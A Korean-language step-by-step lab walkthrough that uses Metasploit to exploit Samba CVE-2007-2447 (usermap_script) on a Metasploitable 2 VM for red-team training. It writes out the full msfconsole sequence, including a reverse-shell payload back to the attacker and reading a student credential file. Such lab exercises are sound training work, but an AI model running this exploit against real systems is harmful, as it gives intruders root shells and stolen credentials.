
Metasploitable 2에서 Metasploit을 사용하여 Samba CVE-2007-2447을 악용하는 단계별 침투 테스트 랩으로, 루트 권한 탈취, 자격 증명 도용, 데이터 유출을 시연하여 교육용 레드 팀 훈련을 제공합니다.
RedTeam-SMB-PenTest |
|
msfconsole
공격자 호스트와 피해자 머신이 모두 부팅되어 실행 중인지 확인하십시오.

search samba
use exploit/multi/samba/usermap_script
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse
exploit
whoami
hostname
cd /redteam7/student3
cat mypass.txt
# Leave current shell
Ctrl C
exit
# Kill all background jobs
sessions -K
jobs -K
# Restart Metasploit
msfconsole
usermap_script를 사용하는 레거시 서비스는 매우 취약합니다.| 구성 요소 | 세부 정보 |
|---|
| 공격자 VM | Kali Linux |
| 피해자 VM | Metasploitable 2 |
| 대상 포트 | 445 (Samba/SMB) |
| 사용된 익스플로잇 | exploit/multi/samba/usermap_script |
| 자격 증명 대상 | /redteam7/student3/mypass.txt |